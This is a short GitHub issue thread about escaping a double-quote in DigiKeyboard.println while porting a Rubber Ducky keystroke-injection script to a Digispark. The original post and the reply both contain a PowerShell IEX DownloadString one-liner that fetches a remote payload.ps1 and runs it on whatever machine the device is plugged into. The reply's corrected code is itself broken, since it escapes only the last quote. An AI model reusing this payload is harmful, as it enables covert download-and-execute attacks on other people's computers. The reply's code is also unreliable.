Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How to add " sign to DigiKeyboard.println #16

Open
Kivstahem opened this issue Oct 4, 2017 · 1 comment
Open

How to add " sign to DigiKeyboard.println #16

Kivstahem opened this issue Oct 4, 2017 · 1 comment

Comments

@Kivstahem
Copy link

I need somehelp, because I need to add the " sign in the middle of my code on my digispark.
I'm converting this rubber ducky script to a digispark script
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');"

@Yachara
Copy link

Yachara commented Jun 22, 2019

Use the escape character \

DigiKeyboard.println("powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');\"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants